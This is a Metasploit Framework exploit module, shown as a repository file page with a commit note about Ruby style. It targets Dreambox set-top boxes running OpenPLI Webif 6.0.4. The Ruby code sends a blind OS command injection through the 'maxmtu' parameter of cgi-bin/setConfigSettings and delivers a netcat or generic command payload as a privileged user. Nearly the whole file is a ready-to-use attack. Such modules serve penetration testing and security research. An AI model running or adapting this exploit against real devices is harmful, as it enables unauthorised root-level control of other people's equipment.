Files
metasploit-gs/modules/exploits/linux/http/dreambox_openpli_shell.rb
T
Tod Beardsley c547e84fa7 Prefer Ruby style for single word collections
According to the Ruby style guide, %w{} collections for arrays of single
words are preferred. They're easier to type, and if you want a quick
grep, they're easier to search.

This change converts all Payloads to this format if there is more than
one payload to choose from.

It also alphabetizes the payloads, so the order can be more predictable,
and for long sets, easier to scan with eyeballs.

See:
  https://github.com/bbatsov/ruby-style-guide#collections
2013-09-24 12:33:31 -05:00

78 lines
2.5 KiB
Ruby

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = GreatRanking
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
'Name' => 'OpenPLI Webif Arbitrary Command Execution',
'Description' => %q{
Some Dream Boxes with OpenPLI v3 beta Images are vulnerable to OS command
injection in the Webif 6.0.4 Web Interface. This is a blind injection, which means
that you will not see any output of your command. A ping command can be used for
testing the vulnerability. This module has been tested in a box with the next
features: Linux Kernel version 2.6.9 (build@plibouwserver) (gcc version 3.4.4) #1
Wed Aug 17 23:54:07 CEST 2011, Firmware release 1.1.0 (27.01.2013), FP Firmware
1.06 and Web Interface 6.0.4-Expert (PLi edition).
},
'Author' => [ 'Michael Messner <devnull[at]s3cur1ty.de>' ],
'License' => MSF_LICENSE,
'References' =>
[
[ 'OSVDB', '90230' ],
[ 'BID', '57943' ],
[ 'EDB', '24498' ],
[ 'URL', 'http://openpli.org/wiki/Webif' ],
[ 'URL', 'http://www.s3cur1ty.de/m1adv2013-007' ]
],
'Platform' => %w{ linux unix },
'Arch' => ARCH_CMD,
'Privileged' => true,
'Payload' =>
{
'Space' => 1024,
'DisableNops' => true,
'Compat' =>
{
'PayloadType' => 'cmd',
'RequiredCmd' => 'netcat generic'
}
},
'Targets' =>
[
[ 'Automatic Target', { }]
],
'DefaultTarget' => 0,
'DisclosureDate' => 'Feb 08 2013'
))
end
def exploit
print_status("#{rhost}:#{rport} - Sending remote command...")
vprint_status("#{rhost}:#{rport} - Blind Exploitation - unknown Exploitation state")
begin
send_request_cgi(
{
'uri' => normalize_uri("cgi-bin", "setConfigSettings"),
'method' => 'GET',
'vars_get' => {
"maxmtu" => "1500&#{payload.encoded}&"
}
})
rescue ::Rex::ConnectionError, Errno::ECONNREFUSED, Errno::ETIMEDOUT
fail_with(Failure::Unreachable, "#{rhost}:#{rport} - HTTP Connection Failed, Aborting")
end
end
end